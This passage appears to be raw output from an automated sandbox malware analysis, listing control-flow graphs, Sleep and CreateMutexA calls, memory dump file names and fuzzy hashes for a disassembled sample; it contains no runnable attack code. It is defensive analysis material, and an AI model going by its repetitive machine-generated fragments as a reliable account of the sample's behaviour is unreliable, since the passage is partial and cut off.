                                                                                                                                                                control_flow_graph 1665 aa682-aa6a2 1669 aa6d0-aa6ec 1665->1669 1670 aa6a4-aa6b0 1665->1670 1671 aa71a-aa739 1669->1671 1672 aa6ee-aa6fa 1669->1672 1673 aa6b2-aa6c0 1670->1673 1674 aa6c6-aa6cd call bd663 1670->1674 1677 aa73b-aa747 1671->1677 1678 aa767-aa916 call b80c0 1671->1678 1675 aa6fc-aa70a 1672->1675 1676 aa710-aa717 call bd663 1672->1676 1673->1674 1679 aa949-aa994 call d6c6a * 2 Sleep CreateMutexA 1673->1679 1674->1669 1675->1676 1675->1679 1676->1671 1682 aa749-aa757 1677->1682 1683 aa75d-aa764 call bd663 1677->1683 1697 aa996-aa998 1679->1697 1698 aa9a7-aa9a8 1679->1698 1682->1679 1682->1683 1683->1678 1697->1698 1699 aa99a-aa9a5 1697->1699 1699->1698
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 7cfe3e1251b627256cb11216107186983714cb24360a49f275e4d87e2482e955
                                                                                                                                                                • Instruction ID: 2973f3d986be282ec556a49badad717cb8ea07ebc545f9255784fb53945f4272
                                                                                                                                                                • Opcode Fuzzy Hash: 7cfe3e1251b627256cb11216107186983714cb24360a49f275e4d87e2482e955
                                                                                                                                                                • Instruction Fuzzy Hash: E8315B317042048BEB18EBB8DC897AEF7B2DF87310F248619E015973D2C7769981C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1701 a9adc-a9ae8 1702 a9aea-a9af8 1701->1702 1703 a9afe-a9d91 call bd663 call b7a00 call a5c10 call a8b30 call b8220 call b7a00 call a5c10 call a8b30 call b8220 1701->1703 1702->1703 1704 aa917 1702->1704 1706 aa953-aa994 Sleep CreateMutexA 1704->1706 1707 aa917 call d6c6a 1704->1707 1712 aa996-aa998 1706->1712 1713 aa9a7-aa9a8 1706->1713 1707->1706 1712->1713 1715 aa99a-aa9a5 1712->1715 1715->1713
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 654a27a59a504f4f0e56175bd70ce277d0a89281a79d08d160e22b90cd6c57b9
                                                                                                                                                                • Instruction ID: b9e379676109de7a167b948fe9b2dd41855c33aee173d41c7f2c8158e784a837
                                                                                                                                                                • Opcode Fuzzy Hash: 654a27a59a504f4f0e56175bd70ce277d0a89281a79d08d160e22b90cd6c57b9
                                                                                                                                                                • Instruction Fuzzy Hash: 43214931714200DBEB18ABA8EDC9BADF7A5EBC3310F20421DE415976D5DB769981C712

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1769 aa856-aa86e 1770 aa89c-aa89e 1769->1770 1771 aa870-aa87c 1769->1771 1774 aa8a9-aa8b1 call a7d30 1770->1774 1775 aa8a0-aa8a7 1770->1775 1772 aa87e-aa88c 1771->1772 1773 aa892-aa899 call bd663 1771->1773 1772->1773 1776 aa94e-aa987 call d6c6a Sleep CreateMutexA 1772->1776 1773->1770 1786 aa8b3-aa8bb call a7d30 1774->1786 1787 aa8e4-aa8e6 1774->1787 1778 aa8eb-aa916 call b80c0 1775->1778 1790 aa98e-aa994 1776->1790 1786->1787 1791 aa8bd-aa8c5 call a7d30 1786->1791 1787->1778 1792 aa996-aa998 1790->1792 1793 aa9a7-aa9a8 1790->1793 1791->1787 1797 aa8c7-aa8cf call a7d30 1791->1797 1792->1793 1795 aa99a-aa9a5 1792->1795 1795->1793 1797->1787 1801 aa8d1-aa8d9 call a7d30 1797->1801 1801->1787 1804 aa8db-aa8e2 1801->1804 1804->1778
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: c54114442a70f0dede2b9b629180bcbfa667502d75e669d71fb93be15834307f
                                                                                                                                                                • Instruction ID: b95e972bb393442a95a70a494a3384b6be875c202189ec05ba4bc1db9752cc66
                                                                                                                                                                • Opcode Fuzzy Hash: c54114442a70f0dede2b9b629180bcbfa667502d75e669d71fb93be15834307f
                                                                                                                                                                • Instruction Fuzzy Hash: 752128313452059AFB3477E8DC9A7BEB3A19F83700F24481AE1489A6D2CF7A8981C253

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1746 aa34f-aa35b 1747 aa35d-aa36b 1746->1747 1748 aa371-aa39a call bd663 1746->1748 1747->1748 1749 aa93a 1747->1749 1754 aa3c8-aa916 call b80c0 1748->1754 1755 aa39c-aa3a8 1748->1755 1752 aa953-aa994 Sleep CreateMutexA 1749->1752 1753 aa93a call d6c6a 1749->1753 1760 aa996-aa998 1752->1760 1761 aa9a7-aa9a8 1752->1761 1753->1752 1757 aa3aa-aa3b8 1755->1757 1758 aa3be-aa3c5 call bd663 1755->1758 1757->1749 1757->1758 1758->1754 1760->1761 1764 aa99a-aa9a5 1760->1764 1764->1761
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
